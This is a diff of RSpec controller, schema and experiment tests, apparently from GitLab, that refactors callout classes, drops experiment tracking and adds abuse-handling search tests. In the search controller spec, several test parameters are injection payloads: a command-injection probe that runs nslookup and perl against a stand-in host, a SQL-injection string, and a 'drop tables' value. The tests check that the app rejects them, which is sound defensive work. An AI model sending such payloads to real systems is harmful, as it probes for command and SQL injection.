merge_request.commits(limit: 1).first) } end end diff --git a/spec/controllers/projects/merge_requests_controller_spec.rb b/spec/controllers/projects/merge_requests_controller_spec.rb index 46b332a8938..36b6df59ef5 100644 --- a/spec/controllers/projects/merge_requests_controller_spec.rb +++ b/spec/controllers/projects/merge_requests_controller_spec.rb @@ -42,32 +42,6 @@ RSpec.describe Projects::MergeRequestsController do get :show, params: params.merge(extra_params) end - context 'with the invite_members_in_comment experiment', :experiment do - context 'when user can invite' do - before do - stub_experiments(invite_members_in_comment: :invite_member_link) - project.add_maintainer(user) - end - - it 'assigns the candidate experience and tracks the event' do - expect(experiment(:invite_members_in_comment)).to track(:view, property: project.root_ancestor.id.to_s) - .for(:invite_member_link) - .with_context(namespace: project.root_ancestor) - .on_next_instance - - go - end - end - - context 'when user can not invite' do - it 'does not track the event' do - expect(experiment(:invite_members_in_comment)).not_to track(:view) - - go - end - end - end - context 'with view param' do before do go(view: 'parallel') @@ -367,7 +341,8 @@ RSpec.describe Projects::MergeRequestsController do namespace_id: project.namespace, project_id: project, id: merge_request.iid, - merge_request: mr_params + merge_request: mr_params, + serializer: 'basic' }.merge(additional_params) put :update, params: params @@ -1377,7 +1352,7 @@ RSpec.describe Projects::MergeRequestsController do 'create' => 0, 'delete' => 0, 'update' => 1, - 'job_name' => build.options.dig(:artifacts, :name).to_s + 'job_name' => build.name ) ) ) diff --git a/spec/controllers/projects/pipelines_controller_spec.rb b/spec/controllers/projects/pipelines_controller_spec.rb index 14c613ff9c4..3fe709a0d44 100644 --- a/spec/controllers/projects/pipelines_controller_spec.rb +++ b/spec/controllers/projects/pipelines_controller_spec.rb @@ -745,9 +745,28 @@ RSpec.describe Projects::PipelinesController do describe 'GET #charts' do let(:pipeline) { create(:ci_pipeline, project: project) } - it_behaves_like 'tracking unique visits', :charts do - let(:request_params) { { namespace_id: project.namespace, project_id: project, id: pipeline.id } } - let(:target_id) { 'p_analytics_pipelines' } + [ + { + chart_param: '', + event: 'p_analytics_ci_cd_pipelines' + }, + { + chart_param: 'pipelines', + event: 'p_analytics_ci_cd_pipelines' + }, + { + chart_param: 'deployment-frequency', + event: 'p_analytics_ci_cd_deployment_frequency' + }, + { + chart_param: 'lead-time', + event: 'p_analytics_ci_cd_lead_time' + } + ].each do |tab| + it_behaves_like 'tracking unique visits', :charts do + let(:request_params) { { namespace_id: project.namespace, project_id: project, id: pipeline.id, chart: tab[:chart_param] } } + let(:target_id) { ['p_analytics_pipelines', tab[:event]] } + end end end diff --git a/spec/controllers/projects/project_members_controller_spec.rb b/spec/controllers/projects/project_members_controller_spec.rb index c352524ec14..d8ef95cf11a 100644 --- a/spec/controllers/projects/project_members_controller_spec.rb +++ b/spec/controllers/projects/project_members_controller_spec.rb @@ -369,7 +369,6 @@ RSpec.describe Projects::ProjectMembersController do context 'when `expires_at` is set' do it 'returns correct json response' do expect(json_response).to eq({ - "expires_in" => "about 1 month", "expires_soon" => false, "expires_at_formatted" => expiry_date.to_time.in_time_zone.to_s(:medium) }) diff --git a/spec/controllers/projects/repositories_controller_spec.rb b/spec/controllers/projects/repositories_controller_spec.rb index cb2579b800a..b7eef3812a4 100644 --- a/spec/controllers/projects/repositories_controller_spec.rb +++ b/spec/controllers/projects/repositories_controller_spec.rb @@ -86,7 +86,7 @@ RSpec.describe Projects::RepositoriesController do describe 'rate limiting' do it 'rate limits user when thresholds hit' do - expect(controller).to receive(:archive_rate_limit_reached?).and_return(true) + allow(Gitlab::ApplicationRateLimiter).to receive(:throttled?).and_return(true) get :archive, params: { namespace_id: project.namespace, project_id: project, id: 'master' }, format: "html" diff --git a/spec/controllers/projects/serverless/functions_controller_spec.rb b/spec/controllers/projects/serverless/functions_controller_spec.rb index 75135839a06..860bbc1c5cc 100644 --- a/spec/controllers/projects/serverless/functions_controller_spec.rb +++ b/spec/controllers/projects/serverless/functions_controller_spec.rb @@ -128,7 +128,7 @@ RSpec.describe Projects::Serverless::FunctionsController do expect(json_response["functions"]).to all( include( - 'url' => "https://#{function_name}-#{serverless_domain_cluster.uuid[0..1]}a1#{serverless_domain_cluster.uuid[2..-3]}f2#{serverless_domain_cluster.uuid[-2..-1]}#{"%x" % environment.id}-#{environment.slug}.#{serverless_domain_cluster.domain}" + 'url' => "https://#{function_name}-#{serverless_domain_cluster.uuid[0..1]}a1#{serverless_domain_cluster.uuid[2..-3]}f2#{serverless_domain_cluster.uuid[-2..]}#{"%x" % environment.id}-#{environment.slug}.#{serverless_domain_cluster.domain}" ) ) end @@ -166,7 +166,7 @@ RSpec.describe Projects::Serverless::FunctionsController do expect(response).to have_gitlab_http_status(:ok) expect(json_response).to include( - 'url' => "https://#{function_name}-#{serverless_domain_cluster.uuid[0..1]}a1#{serverless_domain_cluster.uuid[2..-3]}f2#{serverless_domain_cluster.uuid[-2..-1]}#{"%x" % environment.id}-#{environment.slug}.#{serverless_domain_cluster.domain}" + 'url' => "https://#{function_name}-#{serverless_domain_cluster.uuid[0..1]}a1#{serverless_domain_cluster.uuid[2..-3]}f2#{serverless_domain_cluster.uuid[-2..]}#{"%x" % environment.id}-#{environment.slug}.#{serverless_domain_cluster.domain}" ) end diff --git a/spec/controllers/projects/settings/ci_cd_controller_spec.rb b/spec/controllers/projects/settings/ci_cd_controller_spec.rb index dc7066f6b61..d50f1aa1dd8 100644 --- a/spec/controllers/projects/settings/ci_cd_controller_spec.rb +++ b/spec/controllers/projects/settings/ci_cd_controller_spec.rb @@ -25,6 +25,17 @@ RSpec.describe Projects::Settings::CiCdController do expect(response).to render_template(:show) end + context 'with CI/CD disabled' do + before do + project.project_feature.update_attribute(:builds_access_level, ProjectFeature::DISABLED) + end + + it 'renders show with 404 status code' do + get :show, params: { namespace_id: project.namespace, project_id: project } + expect(response).to have_gitlab_http_status(:not_found) + end + end + context 'with group runners' do let_it_be(:group_runner) { create(:ci_runner, :group, groups: [group]) } let_it_be(:project_runner) { create(:ci_runner, :project, projects: [other_project]) } diff --git a/spec/controllers/projects_controller_spec.rb b/spec/controllers/projects_controller_spec.rb index dafa639a2d5..fd0f9985392 100644 --- a/spec/controllers/projects_controller_spec.rb +++ b/spec/controllers/projects_controller_spec.rb @@ -899,10 +899,34 @@ RSpec.describe ProjectsController do describe '#transfer', :enable_admin_mode do render_views - let_it_be(:project, reload: true) { create(:project) } + let(:project) { create(:project) } + let_it_be(:admin) { create(:admin) } let_it_be(:new_namespace) { create(:namespace) } + shared_examples 'project namespace is not changed' do |flash_message| + it 'project namespace is not changed' do + controller.instance_variable_set(:@project, project) + sign_in(admin) + + old_namespace = project.namespace + + put :transfer, + params: { + namespace_id: old_namespace.path, + new_namespace_id: new_namespace_id, + id: project.path + }, + format: :js + + project.reload + + expect(project.namespace).to eq(old_namespace) + expect(response).to redirect_to(edit_project_path(project)) + expect(flash[:alert]).to eq flash_message + end + end + it 'updates namespace' do sign_in(admin) @@ -917,30 +941,19 @@ RSpec.describe ProjectsController do project.reload expect(project.namespace).to eq(new_namespace) - expect(response).to have_gitlab_http_status(:ok) + expect(response).to redirect_to(edit_project_path(project)) end context 'when new namespace is empty' do - it 'project namespace is not changed' do - controller.instance_variable_set(:@project, project) - sign_in(admin) + let(:new_namespace_id) { nil } - old_namespace = project.namespace - - put :transfer, - params: { - namespace_id: old_namespace.path, - new_namespace_id: nil, - id: project.path - }, - format: :js + it_behaves_like 'project namespace is not changed', s_('TransferProject|Please select a new namespace for your project.') + end - project.reload + context 'when new namespace is the same as the current namespace' do + let(:new_namespace_id) { project.namespace.id } - expect(project.namespace).to eq(old_namespace) - expect(response).to have_gitlab_http_status(:ok) - expect(flash[:alert]).to eq s_('TransferProject|Please select a new namespace for your project.') - end + it_behaves_like 'project namespace is not changed', s_('TransferProject|Project is already in this namespace.') end end @@ -1092,7 +1105,7 @@ RSpec.describe ProjectsController do expect(forked_project.reload.forked?).to be_falsey expect(flash[:notice]).to eq(s_('The fork relationship has been removed.')) - expect(response).to render_template(:remove_fork) + expect(response).to redirect_to(edit_project_path(forked_project)) end end @@ -1108,7 +1121,7 @@ RSpec.describe ProjectsController do format: :js) expect(flash[:notice]).to be_nil - expect(response).to render_template(:remove_fork) + expect(response).to redirect_to(edit_project_path(unforked_project)) end end end diff --git a/spec/controllers/registrations/welcome_controller_spec.rb b/spec/controllers/registrations/welcome_controller_spec.rb index 0a1e6b8ec8f..c444875bf74 100644 --- a/spec/controllers/registrations/welcome_controller_spec.rb +++ b/spec/controllers/registrations/welcome_controller_spec.rb @@ -101,10 +101,6 @@ RSpec.describe Registrations::WelcomeController do context 'when tasks to be done are assigned' do let!(:member1) { create(:group_member, user: user, tasks_to_be_done: %w(ci code)) } - before do - stub_experiments(invite_members_for_task: true) - end - it { is_expected.to redirect_to(issues_dashboard_path(assignee_username: user.username)) } end end diff --git a/spec/controllers/registrations_controller_spec.rb b/spec/controllers/registrations_controller_spec.rb index baf500c2b57..3f7941b3456 100644 --- a/spec/controllers/registrations_controller_spec.rb +++ b/spec/controllers/registrations_controller_spec.rb @@ -159,12 +159,11 @@ RSpec.describe RegistrationsController do let_it_be(:member) { create(:project_member, :invited, invite_email: user_params.dig(:user, :email)) } let(:originating_member_id) { member.id } - let(:extra_session_params) { {} } let(:session_params) do { invite_email: user_params.dig(:user, :email), originating_member_id: originating_member_id - }.merge extra_session_params + } end context 'when member exists from the session key value' do @@ -193,74 +192,6 @@ RSpec.describe RegistrationsController do ) end end - - context 'with the invite_email_preview_text experiment', :experiment do - let(:extra_session_params) { { invite_email_experiment_name: 'invite_email_preview_text' } } - - context 'when member and invite_email_experiment_name exists from the session key value' do - it 'tracks the invite acceptance' do - expect(experiment(:invite_email_preview_text)).to track(:accepted) - .with_context(actor: member) - .on_next_instance - - subject - end - end - - context 'when member does not exist from the session key value' do - let(:originating_member_id) { -1 } - - it 'does not track invite acceptance' do - expect(experiment(:invite_email_preview_text)).not_to track(:accepted) - - subject - end - end - - context 'when invite_email_experiment_name does not exist from the session key value' do - let(:extra_session_params) { {} } - - it 'does not track invite acceptance' do - expect(experiment(:invite_email_preview_text)).not_to track(:accepted) - - subject - end - end - end - - context 'with the invite_email_preview_text experiment', :experiment do - let(:extra_session_params) { { invite_email_experiment_name: 'invite_email_from' } } - - context 'when member and invite_email_experiment_name exists from the session key value' do - it 'tracks the invite acceptance' do - expect(experiment(:invite_email_from)).to track(:accepted) - .with_context(actor: member) - .on_next_instance - - subject - end - end - - context 'when member does not exist from the session key value' do - let(:originating_member_id) { -1 } - - it 'does not track invite acceptance' do - expect(experiment(:invite_email_from)).not_to track(:accepted) - - subject - end - end - - context 'when invite_email_experiment_name does not exist from the session key value' do - let(:extra_session_params) { {} } - - it 'does not track invite acceptance' do - expect(experiment(:invite_email_from)).not_to track(:accepted) - - subject - end - end - end end context 'when invite email matches email used on registration' do diff --git a/spec/controllers/repositories/git_http_controller_spec.rb b/spec/controllers/repositories/git_http_controller_spec.rb index b5cd14154a3..4a6e745cd63 100644 --- a/spec/controllers/repositories/git_http_controller_spec.rb +++ b/spec/controllers/repositories/git_http_controller_spec.rb @@ -90,6 +90,14 @@ RSpec.describe Repositories::GitHttpController do end end end + + context 'when the user is a deploy token' do + it_behaves_like Repositories::GitHttpController do + let(:container) { project } + let(:user) { create(:deploy_token, :project, projects: [project]) } + let(:access_checker_class) { Gitlab::GitAccess } + end + end end context 'when repository container is a project wiki' do diff --git a/spec/controllers/root_controller_spec.rb b/spec/controllers/root_controller_spec.rb index dbf1b3baf25..c6a8cee2f70 100644 --- a/spec/controllers/root_controller_spec.rb +++ b/spec/controllers/root_controller_spec.rb @@ -131,28 +131,10 @@ RSpec.describe RootController do context 'who uses the default dashboard setting', :aggregate_failures do render_views - context 'with customize homepage banner' do - it 'renders the default dashboard' do - get :index - - expect(response).to render_template 'root/index' - expect(response.body).to have_css('.js-customize-homepage-banner') - end - end - - context 'without customize homepage banner' do - before do - Users::DismissUserCalloutService.new( - container: nil, current_user: user, params: { feature_name: UserCalloutsHelper::CUSTOMIZE_HOMEPAGE } - ).execute - end - - it 'renders the default dashboard' do - get :index + it 'renders the default dashboard' do + get :index - expect(response).to render_template 'root/index' - expect(response.body).not_to have_css('.js-customize-homepage-banner') - end + expect(response).to render_template 'dashboard/projects/index' end end end diff --git a/spec/controllers/search_controller_spec.rb b/spec/controllers/search_controller_spec.rb index 73e8e0c7dd4..a54f16ec237 100644 --- a/spec/controllers/search_controller_spec.rb +++ b/spec/controllers/search_controller_spec.rb @@ -127,21 +127,26 @@ RSpec.describe SearchController do context 'check search term length' do let(:search_queries) do - char_limit = SearchService::SEARCH_CHAR_LIMIT - term_limit = SearchService::SEARCH_TERM_LIMIT + char_limit = Gitlab::Search::Params::SEARCH_CHAR_LIMIT + term_limit = Gitlab::Search::Params::SEARCH_TERM_LIMIT + term_char_limit = Gitlab::Search::AbuseDetection::ABUSIVE_TERM_SIZE { - chars_under_limit: ('a' * (char_limit - 1)), - chars_over_limit: ('a' * (char_limit + 1)), - terms_under_limit: ('abc ' * (term_limit - 1)), - terms_over_limit: ('abc ' * (term_limit + 1)) + chars_under_limit: (('a' * (term_char_limit - 1) + ' ') * (term_limit - 1))[0, char_limit], + chars_over_limit: (('a' * (term_char_limit - 1) + ' ') * (term_limit - 1))[0, char_limit + 1], + terms_under_limit: ('abc ' * (term_limit - 1)), + terms_over_limit: ('abc ' * (term_limit + 1)), + term_length_over_limit: ('a' * (term_char_limit + 1)), + term_length_under_limit: ('a' * (term_char_limit - 1)) } end where(:string_name, :expectation) do - :chars_under_limit | :not_to_set_flash - :chars_over_limit | :set_chars_flash - :terms_under_limit | :not_to_set_flash - :terms_over_limit | :set_terms_flash + :chars_under_limit | :not_to_set_flash + :chars_over_limit | :set_chars_flash + :terms_under_limit | :not_to_set_flash + :terms_over_limit | :set_terms_flash + :term_length_under_limit | :not_to_set_flash + :term_length_over_limit | :not_to_set_flash # abuse, so do nothing. end with_them do @@ -172,6 +177,12 @@ RSpec.describe SearchController do expect(response).to redirect_to new_user_session_path end + + it 'redirects to login page when trying to circumvent the restriction' do + get :show, params: { scope: 'projects', project_id: non_existing_record_id, search: '*' } + + expect(response).to redirect_to new_user_session_path + end end context 'for authenticated user' do @@ -181,6 +192,14 @@ RSpec.describe SearchController do expect(response).to have_gitlab_http_status(:ok) end end + + context 'handling abusive search_terms' do + it 'succeeds but does NOT do anything' do + get :show, params: { scope: 'projects', search: '*', repository_ref: '-1%20OR%203%2B640-640-1=0%2B0%2B0%2B1' } + expect(response).to have_gitlab_http_status(:ok) + expect(assigns(:search_results)).to be_a Gitlab::EmptySearchResults + end + end end context 'tab feature flags' do @@ -215,16 +234,6 @@ RSpec.describe SearchController do end end - it 'strips surrounding whitespace from search query' do - get :show, params: { scope: 'notes', search: ' foobar ' } - expect(assigns[:search_term]).to eq 'foobar' - end - - it 'strips surrounding whitespace from autocomplete term' do - expect(controller).to receive(:search_autocomplete_opts).with('youcompleteme') - get :autocomplete, params: { term: ' youcompleteme ' } - end - it 'finds issue comments' do project = create(:project, :public) note = create(:note_on_issue, project: project) @@ -283,7 +292,7 @@ RSpec.describe SearchController do end end - describe 'GET #count' do + describe 'GET #count', :aggregate_failures do it_behaves_like 'when the user cannot read cross project', :count, { search: 'hello', scope: 'projects' } it_behaves_like 'with external authorization service enabled', :count, { search: 'hello', scope: 'projects' } it_behaves_like 'support for active record query timeouts', :count, { search: 'hello', scope: 'projects' }, :search_results, :json @@ -315,13 +324,40 @@ RSpec.describe SearchController do expect(response).to have_gitlab_http_status(:ok) - expect(response.headers['Cache-Control']).to eq('private, no-store') + expect(response.headers['Cache-Control']).to eq('max-age=60, private') + end + + it 'does NOT blow up if search param is NOT a string' do + get :count, params: { search: ['hello'], scope: 'projects' } + expect(response).to have_gitlab_http_status(:ok) + expect(json_response).to eq({ 'count' => '0' }) + + get :count, params: { search: { nested: 'hello' }, scope: 'projects' } + expect(response).to have_gitlab_http_status(:ok) + expect(json_response).to eq({ 'count' => '0' }) + end + + it 'does NOT blow up if repository_ref contains abusive characters' do + get :count, params: { + search: 'hello', + repository_ref: "(nslookup%20hitqlwv501f.somewhere.bad%7C%7Cperl%20-e%20%22gethostbyname('hitqlwv501f.somewhere.bad')%22)", + scope: 'projects' + } + expect(response).to have_gitlab_http_status(:ok) + expect(json_response).to eq({ 'count' => '0' }) end end describe 'GET #autocomplete' do it_behaves_like 'when the user cannot read cross project', :autocomplete, { term: 'hello' } it_behaves_like 'with external authorization service enabled', :autocomplete, { term: 'hello' } + it_behaves_like 'support for active record query timeouts', :autocomplete, { term: 'hello' }, :project, :json + + it 'returns an empty array when given abusive search term' do + get :autocomplete, params: { term: ('hal' * 9000), scope: 'projects' } + expect(response).to have_gitlab_http_status(:ok) + expect(json_response).to match_array([]) + end end describe '#append_info_to_payload' do @@ -351,6 +387,35 @@ RSpec.describe SearchController do get :show, params: { search: 'hello world', group_id: '123', project_id: '456' } end end + + context 'abusive searches', :aggregate_failures do + let(:project) { create(:project, :public, name: 'hello world') } + let(:make_abusive_request) do + get :show, params: { scope: '1;drop%20tables;boom', search: 'hello world', project_id: project.id } + end + + before do + enable_external_authorization_service_check + end + + it 'returns EmptySearchResults' do + expect(Gitlab::EmptySearchResults).to receive(:new).and_call_original + make_abusive_request + expect(response).to have_gitlab_http_status(:ok) + end + + context 'when the feature flag is disabled' do + before do + stub_feature_flags(prevent_abusive_searches: false) + end + + it 'returns a regular search result' do + expect(Gitlab::EmptySearchResults).not_to receive(:new) + make_abusive_request + expect(response).to have_gitlab_http_status(:ok) + end + end + end end context 'unauthorized user' do diff --git a/spec/controllers/sent_notifications_controller_spec.rb b/spec/controllers/sent_notifications_controller_spec.rb index 02aaa5b16f1..ec74a902258 100644 --- a/spec/controllers/sent_notifications_controller_spec.rb +++ b/spec/controllers/sent_notifications_controller_spec.rb @@ -10,19 +10,19 @@ RSpec.describe SentNotificationsController do let(:issue) do create(:issue, project: target_project) do |issue| - issue.subscriptions.create(user: user, project: target_project, subscribed: true) + issue.subscriptions.create!(user: user, project: target_project, subscribed: true) end end let(:confidential_issue) do create(:issue, project: target_project, confidential: true) do |issue| - issue.subscriptions.create(user: user, project: target_project, subscribed: true) + issue.subscriptions.create!(user: user, project: target_project, subscribed: true) end end let(:merge_request) do create(:merge_request, source_project: target_project, target_project: target_project) do |mr| - mr.subscriptions.create(user: user, project: target_project, subscribed: true) + mr.subscriptions.create!(user: user, project: target_project, subscribed: true) end end @@ -213,7 +213,7 @@ RSpec.describe SentNotificationsController do context 'when the force param is not passed' do let(:merge_request) do create(:merge_request, source_project: project, author: user) do |merge_request| - merge_request.subscriptions.create(user: user, project: project, subscribed: true) + merge_request.subscriptions.create!(user: user, project: project, subscribed: true) end end diff --git a/spec/controllers/sessions_controller_spec.rb b/spec/controllers/sessions_controller_spec.rb index c233e5b7c15..31de00dd8bd 100644 --- a/spec/controllers/sessions_controller_spec.rb +++ b/spec/controllers/sessions_controller_spec.rb @@ -403,7 +403,7 @@ RSpec.describe SessionsController do context 'when the user is on their last attempt' do before do - user.update(failed_attempts: User.maximum_attempts.pred) + user.update!(failed_attempts: User.maximum_attempts.pred) end context 'when OTP is valid' do diff --git a/spec/controllers/user_callouts_controller_spec.rb b/spec/controllers/users/callouts_controller_spec.rb index 3bb8d78a6b0..13dc565b4ad 100644 --- a/spec/controllers/user_callouts_controller_spec.rb +++ b/spec/controllers/users/callouts_controller_spec.rb @@ -2,7 +2,7 @@ require 'spec_helper' -RSpec.describe UserCalloutsController do +RSpec.describe Users::CalloutsController do let_it_be(:user) { create(:user) } before do @@ -15,11 +15,11 @@ RSpec.describe UserCalloutsController do subject { post :create, params: params, format: :json } context 'with valid feature name' do - let(:feature_name) { UserCallout.feature_names.each_key.first } + let(:feature_name) { Users::Callout.feature_names.each_key.first } context 'when callout entry does not exist' do it 'creates a callout entry with dismissed state' do - expect { subject }.to change { UserCallout.count }.by(1) + expect { subject }.to change { Users::Callout.count }.by(1) end it 'returns success' do @@ -30,10 +30,10 @@ RSpec.describe UserCalloutsController do end context 'when callout entry already exists' do - let!(:callout) { create(:user_callout, feature_name: UserCallout.feature_names.each_key.first, user: user) } + let!(:callout) { create(:callout, feature_name: Users::Callout.feature_names.each_key.first, user: user) } it 'returns success', :aggregate_failures do - expect { subject }.not_to change { UserCallout.count } + expect { subject }.not_to change { Users::Callout.count } expect(response).to have_gitlab_http_status(:ok) end end diff --git a/spec/db/schema_spec.rb b/spec/db/schema_spec.rb index 521b4cd4002..edb412cbb9c 100644 --- a/spec/db/schema_spec.rb +++ b/spec/db/schema_spec.rb @@ -26,10 +26,8 @@ RSpec.describe 'Database schema' do boards: %w[milestone_id iteration_id], chat_names: %w[chat_id team_id user_id], chat_teams: %w[team_id], - ci_builds: %w[erased_by_id runner_id trigger_request_id user_id], + ci_builds: %w[erased_by_id runner_id trigger_request_id], ci_namespace_monthly_usages: %w[namespace_id], - ci_pipelines: %w[user_id], - ci_pipeline_chat_data: %w[chat_name_id], # it uses the loose foreign key featue ci_runner_projects: %w[runner_id], ci_trigger_requests: %w[commit_id], cluster_providers_aws: %w[security_group_id vpc_id access_key_id], @@ -53,6 +51,7 @@ RSpec.describe 'Database schema' do identities: %w[user_id], import_failures: %w[project_id], issues: %w[last_edited_by_id state_id], + issue_emails: %w[email_message_id], jira_tracker_data: %w[jira_issue_transition_id], keys: %w[user_id], label_links: %w[target_id], @@ -66,8 +65,6 @@ RSpec.describe 'Database schema' do oauth_access_grants: %w[resource_owner_id application_id], oauth_access_tokens: %w[resource_owner_id application_id], oauth_applications: %w[owner_id], - packages_build_infos: %w[pipeline_id], - packages_package_file_build_infos: %w[pipeline_id], product_analytics_events_experimental: %w[event_id txn_id user_id], project_group_links: %w[group_id], project_statistics: %w[namespace_id], @@ -83,7 +80,6 @@ RSpec.describe 'Database schema' do subscriptions: %w[user_id subscribable_id], suggestions: %w[commit_id], taggings: %w[tag_id taggable_id tagger_id], - terraform_state_versions: %w[ci_build_id], timelogs: %w[user_id], todos: %w[target_id commit_id], uploads: %w[model_id], @@ -101,6 +97,8 @@ RSpec.describe 'Database schema' do let(:indexes) { connection.indexes(table) } let(:columns) { connection.columns(table) } let(:foreign_keys) { connection.foreign_keys(table) } + let(:loose_foreign_keys) { Gitlab::Database::LooseForeignKeys.definitions.group_by(&:from_table).fetch(table, []) } + let(:all_foreign_keys) { foreign_keys + loose_foreign_keys } # take the first column in case we're using a composite primary key let(:primary_key_column) { Array(connection.primary_key(table)).first } @@ -113,7 +111,7 @@ RSpec.describe 'Database schema' do columns = columns.split(',') if columns.is_a?(String) columns.first.chomp end - foreign_keys_columns = foreign_keys.map(&:column) + foreign_keys_columns = all_foreign_keys.map(&:column) # Add the primary key column to the list of indexed columns because # postgres and mysql both automatically create an index on the primary @@ -128,7 +126,7 @@ RSpec.describe 'Database schema' do context 'columns ending with _id' do let(:column_names) { columns.map(&:name) } let(:column_names_with_id) { column_names.select { |column_name| column_name.ends_with?('_id') } } - let(:foreign_keys_columns) { foreign_keys.map(&:column) } + let(:foreign_keys_columns) { all_foreign_keys.map(&:column).uniq } # we can have FK and loose FK present at the same time let(:ignored_columns) { ignored_fk_columns(table) } it 'do have the foreign keys' do @@ -170,7 +168,7 @@ RSpec.describe 'Database schema' do 'PrometheusMetric' => %w[group], 'ResourceLabelEvent' => %w[action], 'User' => %w[layout dashboard project_view], - 'UserCallout' => %w[feature_name], + 'Users::Callout' => %w[feature_name], 'PrometheusAlert' => %w[operator] }.freeze diff --git a/spec/dependencies/omniauth_saml_spec.rb b/spec/dependencies/omniauth_saml_spec.rb index fa179eb1516..8956fa44b7a 100644 --- a/spec/dependencies/omniauth_saml_spec.rb +++ b/spec/dependencies/omniauth_saml_spec.rb @@ -7,7 +7,7 @@ RSpec.describe 'processing of SAMLResponse in dependencies' do let(:mock_saml_response) { File.read('spec/fixtures/authentication/saml_response.xml') } let(:saml_strategy) { OmniAuth::Strategies::SAML.new({}) } let(:session_mock) { {} } - let(:settings) { OpenStruct.new({ soft: false, idp_cert_fingerprint: 'something' }) } + let(:settings) { double('settings', { soft: false, idp_cert_fingerprint: 'something' }) } let(:auth_hash) { Gitlab::Auth::Saml::AuthHash.new(saml_strategy) } subject { auth_hash.authn_context } diff --git a/spec/experiments/application_experiment_spec.rb b/spec/experiments/application_experiment_spec.rb index b0788eec808..5146fe3e752 100644 --- a/spec/experiments/application_experiment_spec.rb +++ b/spec/experiments/application_experiment_spec.rb @@ -3,7 +3,7 @@ require 'spec_helper' RSpec.describe ApplicationExperiment, :experiment do - subject { described_class.new('namespaced/stub', **context) } + subject(:application_experiment) { described_class.new('namespaced/stub', **context) } let(:context) { {} } let(:feature_definition) { { name: 'namespaced_stub', type: 'experiment', default_enabled: false } } @@ -15,7 +15,7 @@ RSpec.describe ApplicationExperiment, :experiment do end before do - allow(subject).to receive(:enabled?).and_return(true) + allow(application_experiment).to receive(:enabled?).and_return(true) end it "doesn't raise an exception without a defined control" do @@ -26,7 +26,7 @@ RSpec.describe ApplicationExperiment, :experiment do describe "#enabled?" do before do - allow(subject).to receive(:enabled?).and_call_original + allow(application_experiment).to receive(:enabled?).and_call_original allow(Feature::Definition).to receive(:get).and_return('_instance_') allow(Gitlab).to receive(:dev_env_or_com?).and_return(true) @@ -34,25 +34,25 @@ RSpec.describe ApplicationExperiment, :experiment do end it "is enabled when all criteria are met" do - expect(subject).to be_enabled + expect(application_experiment).to be_enabled end it "isn't enabled if the feature definition doesn't exist" do expect(Feature::Definition).to receive(:get).with('namespaced_stub').and_return(nil) - expect(subject).not_to be_enabled + expect(application_experiment).not_to be_enabled end it "isn't enabled if we're not in dev or dotcom environments" do expect(Gitlab).to receive(:dev_env_or_com?).and_return(false) - expect(subject).not_to be_enabled + expect(application_experiment).not_to be_enabled end it "isn't enabled if the feature flag state is :off" do expect(Feature).to receive(:get).with('namespaced_stub').and_return(double(state: :off)) - expect(subject).not_to be_enabled + expect(application_experiment).not_to be_enabled end end @@ -60,11 +60,11 @@ RSpec.describe ApplicationExperiment, :experiment do let(:should_track) { true } before do - allow(subject).to receive(:should_track?).and_return(should_track) + allow(application_experiment).to receive(:should_track?).and_return(should_track) end it "tracks the assignment", :snowplow do - subject.publish + application_experiment.publish expect_snowplow_event( category: 'namespaced/stub', @@ -74,24 +74,16 @@ RSpec.describe ApplicationExperiment, :experiment do end it "publishes to the client" do - expect(subject).to receive(:publish_to_client) + expect(application_experiment).to receive(:publish_to_client) - subject.publish - end - - it "publishes to the database if we've opted for that" do - subject.record! - - expect(subject).to receive(:publish_to_database) - - subject.publish + application_experiment.publish end context 'when we should not track' do let(:should_track) { false } it 'does not track an event to Snowplow', :snowplow do - subject.publish + application_experiment.publish expect_no_snowplow_event end @@ -102,13 +94,13 @@ RSpec.describe ApplicationExperiment, :experiment do signature = { key: '86208ac54ca798e11f127e8b23ec396a', variant: 'control' } expect(Gon).to receive(:push).with({ experiment: { 'namespaced/stub' => hash_including(signature) } }, true) - subject.publish_to_client + application_experiment.publish_to_client end it "handles when Gon raises exceptions (like when it can't be pushed into)" do expect(Gon).to receive(:push).and_raise(NoMethodError) - expect { subject.publish_to_client }.not_to raise_error + expect { application_experiment.publish_to_client }.not_to raise_error end context 'when we should not track' do @@ -117,7 +109,7 @@ RSpec.describe ApplicationExperiment, :experiment do it 'returns early' do expect(Gon).not_to receive(:push) - subject.publish_to_client + application_experiment.publish_to_client end end end @@ -125,13 +117,15 @@ RSpec.describe ApplicationExperiment, :experiment do describe '#publish_to_database' do using RSpec::Parameterized::TableSyntax + let(:publish_to_database) { application_experiment.publish_to_database } + shared_examples 'does not record to the database' do it 'does not create an experiment record' do - expect { subject.publish_to_database }.not_to change(Experiment, :count) + expect { publish_to_database }.not_to change(Experiment, :count) end it 'does not create an experiment subject record' do - expect { subject.publish_to_database }.not_to change(ExperimentSubject, :count) + expect { publish_to_database }.not_to change(ExperimentSubject, :count) end end @@ -139,16 +133,16 @@ RSpec.describe ApplicationExperiment, :experiment do let(:context) { { context_key => context_value } } where(:context_key, :context_value, :object_type) do - :namespace | build(:namespace) | :namespace - :group | build(:namespace) | :namespace - :project | build(:project) | :project - :user | build(:user) | :user - :actor | build(:user) | :user + :namespace | build(:namespace, id: non_existing_record_id) | :namespace + :group | build(:namespace, id: non_existing_record_id) | :namespace + :project | build(:project, id: non_existing_record_id) | :project + :user | build(:user, id: non_existing_record_id) | :user + :actor | build(:user, id: non_existing_record_id) | :user end with_them do it 'creates an experiment and experiment subject record' do - expect { subject.publish_to_database }.to change(Experiment, :count).by(1) + expect { publish_to_database }.to change(Experiment, :count).by(1) expect(Experiment.last.name).to eq('namespaced/stub') expect(ExperimentSubject.last.send(object_type)).to eq(context[context_key]) @@ -156,6 +150,16 @@ RSpec.describe ApplicationExperiment, :experiment do end end + context "when experiment hasn't ran" do + let(:context) { { user: create(:user) } } + + it 'sets a variant on the experiment subject' do + publish_to_database + + expect(ExperimentSubject.last.variant).to eq('control') + end + end + context 'when there is not a usable subject' do let(:context) { { context_key => context_value } } @@ -183,15 +187,15 @@ RSpec.describe ApplicationExperiment, :experiment do end it "doesn't track if we shouldn't track" do - allow(subject).to receive(:should_track?).and_return(false) + allow(application_experiment).to receive(:should_track?).and_return(false) - subject.track(:action) + application_experiment.track(:action) expect_no_snowplow_event end it "tracks the event with the expected arguments and merged contexts" do - subject.track(:action, property: '_property_', context: [fake_context]) + application_experiment.track(:action, property: '_property_', context: [fake_context]) expect_snowplow_event( category: 'namespaced/stub', @@ -229,11 +233,80 @@ RSpec.describe ApplicationExperiment, :experiment do ] ) end + + context "when using known context resources" do + let(:user) { build(:user, id: non_existing_record_id) } + let(:project) { build(:project, id: non_existing_record_id) } + let(:namespace) { build(:namespace, id: 